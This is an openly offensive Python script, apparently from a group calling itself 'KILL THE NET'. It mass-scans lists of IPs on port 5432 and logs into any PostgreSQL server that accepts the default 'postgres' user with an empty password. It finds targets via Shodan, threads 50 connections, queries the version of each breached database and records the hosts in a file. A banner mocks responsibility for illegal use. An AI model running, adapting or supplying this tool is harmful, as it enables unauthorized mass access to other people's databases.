##########################
PostgreSQL- Attack on default password
##########################
An easy way to get access to database without any brute force attack.
[+]- Scan ips on port 5432 or Dork on Shodan.
[+]-Exploit:
user = "postgres"
password = ""
port = "5432"
database = "postgres"
and connect to databse.
##########################
For mass scaning put your ip's on text file and run the script :)
##########################
USAGE : python script.py ips.txt
----------------------------------------------
# -*- coding: utf-8 -*
#!/usr/bin/python
#####################################
##KILL THE NET##
#### PS: CHANGE Your Threads pool on line 105 to make script more faster :)
##############[LIBS]###################
import os, sys, codecs, random, socket
from multiprocessing.dummy import Pool
import time
from time import time as timer
from platform import system
from colorama import init
try:
import psycopg2
except ImportError:
print('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')
print('[-] pip install psycopg2')
print('[+] you need to install psycopg2 module (For MacOS try with brew)')
sys.exit()
init(autoreset=True)
##########################################################################################
ktnred = '\033[31m'
ktngreen = '\033[32m'
ktn3yell = '\033[33m'
ktn4blue = '\033[34m'
ktn5purp = '\033[35m'
ktn6blueblue = '\033[36m'
ktn7grey = '\033[37m'
CEND = '\033[0m'
#####################################
##########################################################################################
try:
with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f:
ooo = f.read().splitlines()
except IndexError:
print (ktnred + '[+]================> ' + 'USAGE: '+sys.argv[0]+' listip.txt' + CEND)
pass
ooo = list((ooo))
##########################################################################################
def checkip(ooo):
ip = ooo
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
killz = sock.connect_ex((ip,5432))
if killz == 0:
print (ktn5purp + '[+]=[ GOOD IP: '+ ip +' ]=[+]' + CEND)
connect(ip)
else:
print (ktnred + '[+]=[SOORY NOT GOOD IP: ' + ip +' ]=[+]' + CEND)
pass
def connect(ip):
try:
connection = psycopg2.connect(user = "postgres",
password = "",
host = ip,
port = "5432",
database = "postgres")
cursor = connection.cursor()
# Print PostgreSQL Connection properties
print ( connection.get_dsn_parameters(),"\n")
# Print PostgreSQL version
cursor.execute("SELECT version();")
record = cursor.fetchone()
print("You are connected to - ", record, "\n")
open('connected-db.txt', 'a').write('=='*5 + '[START]' + '=='*5 + '\n' + '[IP]: '+ ip + '\n'+'[USER: postgres, PASSWORD: NULL, PORT: 5432, DB: postgres]' + '\n' + '=='*5 + '[END]' + '=='*5 + '\n')
except:
print ("Error while connecting to PostgreSQL")
##########################################################################################
##########################################################################################
def logo():
clear = "\x1b[0m"
colors = [36, 32, 34, 35, 31, 37]
x = '''
FEDERATION BLACK HAT SYSTEM | IG: @_gghost666_
<-.(`-') _ (`-') (`-').-> (`-') _<-. (`-')_ (`-') _(`-')
__( OO) (_) <-. <-. ( OO).-> (OO )__ ( OO).-/ \( OO) ) ( OO).-/( OO).->
'-'. ,--.,-(`-'),--. ) ,--. ) / '._ ,--. ,'-'(,------.,--./ ,--/ (,------./ '._
| .' /| ( OO)| (`-') | (`-')|'--...__)| | | | | .---'| \ | | | .---'|'--...__)
| /)| | )| |OO ) | |OO )`--. .--'| `-' |(| '--. | . '| |)(| '--. `--. .--'
| . '(| |_/(| '__ |(| '__ | | | | .-. | | .--' | |\ | | .--' | |
| |\ \| |'->| |' | |' | | | | | | | `---.| | \ | | `---. | |
`--' '--'`--' `-----' `-----' `--' `--' `--' `------'`--' `--' `------' `--'
KILL THE NET
FB: fb/KtN.1990
Note! : We Accept any responsibility for any illegal usage :). '''
for N, line in enumerate(x.split("\n")):
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
time.sleep(0.05)
pass
logo()
##########################################################################################
def Main():
try:
start = timer()
ThreadPool = Pool(50)
Threads = ThreadPool.map(checkip, ooo)
print('TIME TAKE: ' + str(timer() - start) + ' S')
except:
pass
if __name__ == '__main__':
Main()